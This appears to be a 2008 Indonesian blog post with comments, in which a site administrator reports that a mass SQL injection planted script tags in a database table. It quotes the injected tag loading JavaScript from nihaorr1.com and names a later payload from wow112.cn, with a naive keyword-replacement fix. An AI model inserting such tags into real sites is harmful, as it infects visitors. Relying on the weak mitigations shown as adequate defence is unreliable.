Bagaimana Mengatasi Serangan “Nihaorr1”?
Pindahan dari Multiply
URL: http://webkppn.multiply.com/journal/item/5/Bagaimana-Mengatasi-Serangan-Nihaorr1
Belum setengah jam yang lalu saya melihat hal aneh di halaman download website KPPN Khusus Banda Aceh. Anehnya, setiap baris terasa lama dalam menampilkannya karena harus “menanti hubungan” dengan nihaorr1.com. Wah! Apa ini? Karena penasaran, saya mencoba membuka http://www.nihaorr1.com. Ternyata Mallware Warning di komputer saya bilang begini, “Warning – visiting this web site may harm your computer!”
Saya lihat script di “download.asp” tidak ada yang aneh. Oh, ternyata biang keroknya ada di dalam tabel “download” yang ada di database SQL Server. Ada sisipan “<script src=http://www.nihaorr1.com/1.js></script>” di setiap baris pada kolom “deskripsi.” Selama ini SQL Server memang dipakai website untuk menampung database laian-lain, selain SP2D. Yang jadi pertanyaan, kenapa si Nihaorr1 ini bisa menyusup ke database SQL Server? Apa yang salah? Apakah ini ada kaitannya dengan script koneksi ke SQL Server yang mungkin terlalu sederhana? Lihat:
set conumum=Server.CreateObject(“ADODB.Connection”)
conumum.Open “Provider=SQLOLEDB.1;Persist Security Info=True;User ID=xxxx;Initial Catalog=xxxx”
Sejauh ini yang ketahuan baru tabel “download.” Tidak menutup kemungkinan, serangan akan menjalar ke tabel-tabel lain. Waduh, gimana nih ya?
Mungkin di sini ada pemecahannya, tapi saya belum baca:
http://forums.iis.net/p/1148917/1867511.aspx
jamurkuping wrote on Apr 30, ’08
mas.. itu berarti udah ada orang yang berhasil masuk ke sistem…
soalnya, nambah script secara langsung itu salah satu bukti adanya serangan langsung
ahmadabdulhaq wrote on Apr 30, ’08, edited on Apr 30, ’08
Saya pikir, inilah bahayanya SQL injection. Pagi ini saya menambahkan script di “general.asp” sebagai berikut:
Ini cukup untuik mencegah variabel yang biasa dipakai untuk melakukan SQL injection. O ya, fungsi IllegalChars isinya adalah sebagai berikut:
Comment deleted at the request of the author.
ahmadabdulhaq wrote on May 16, ’08
Aduh, itu hacker Cina menyerang lagi. Ketahuannya tadi pagi pas saya buka halaman download. Kali ini bukan nihaorr1.com, tapi wow112.cn. Script yang dijalankan: http:// http://www.wow112. cn/m.js (tanpa spasi). Berarti bukan cuma SQL injection dong penyebabnya?
Untuk mengantisipasinya, saya baru lakukan replace di script ASP untuk mengganti kata-kata “script” dengan “scriptx”. Hasilnya, script m.js itu bisa tidak berjalan.
Saya masih bingung….. 🙁
ahmadabdulhaq wrote on May 16, ’08
jamurkuping, kamu pernah sarankan ini ‘kan?: “periksa seluruh LOG koneksi. terutama koneksi dari luar.”r>Caranya bagaimana ya?